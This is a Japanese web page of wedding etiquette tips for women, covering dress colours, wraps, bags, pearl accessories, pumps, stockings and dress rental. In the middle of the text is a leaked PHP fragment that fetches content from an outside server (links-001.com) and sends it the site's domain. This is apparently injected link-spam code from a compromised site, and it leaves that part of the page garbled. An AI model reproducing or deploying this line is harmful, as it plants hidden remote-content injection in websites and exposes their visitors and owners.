前へ
次へ

女性のためのはじめての結婚式のマナー

大学を卒業して就職をし、数年が立つ頃には少しずつ結婚式に呼ばれる機会というのは増えてきます。
その時に失敗をして恥をかかないよう、結婚式への参加が初心者の方に結婚式のマナーについて紹介します。
服装からご祝儀まで決まり事がいくつもあるので、奇をてらったりせずに周囲に合わせて守るべきマナーをきちんと守ることが、自分自身への評価に繋がります。
社会人としてのマナーが問われることになるのできちんとマナーを守りましょう。
まず、結婚式のマナーで大切なことは服装です。
結婚式や披露宴では露出度の高い服装はNGとされています。
たしかにおめでたい席ではあるので目一杯おしゃれをして参加することは大切ですが、超えてはいけないラインが存在します。
ノースリーブのドレスを着用する時には、必ず羽織物を着用して露出を控えることが大切です。
また、白や黒といった色は避けたほうが良いです。
クリーム色でも白に見えるものは着用しないほうが無難です。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

アクセサリやバッグなどの小物に関する結婚式のマナーを紹介します。
バッグは革製やトートバッグは避けたほうが吉です。
革製品の場合、殺生をイメージすることからおめでたい席にはに使わないアイテムです。
また、トートバッグなどの布製のかばんはカジュアルすぎてしまうので、結婚式に持っていると場違いになります。
アクセサリーは、パールのネックレスがド定番です。
花飾りなどは花嫁さんとバッティングする可能性があるので避けたいところです。
意外と見落としがちで失敗が多いのが足元です。
結婚式や披露宴は、できるだけパンプスを履くことをおすすめします。
よくある失敗がオープントゥパンプスです。
これは格式がワンランク下がってしまうので、フォーマルな場面では着用することは避けることが好ましいです。
また、ブーツやサンダルもカジュアル過ぎるので結婚式には似つかわしくありません。
ストッキングはベージュのシンプルなものを着用するか、黒の場合は柄のあるストッキングを選ぶようにします。
タイツや素足はマナー違反になってしまうので、夏場や冬の寒い時には十分に注意をしておきたいところです。
最近では、ネットでドレスのレンタルのサービスが人気を集めています。
足の先から頭の天辺までコーディネートされたものを一式レンタルできるので、結婚式のマナーに不安のある人でも安心してレンタルすることができると評判のサービスとなっているのです。

Page Top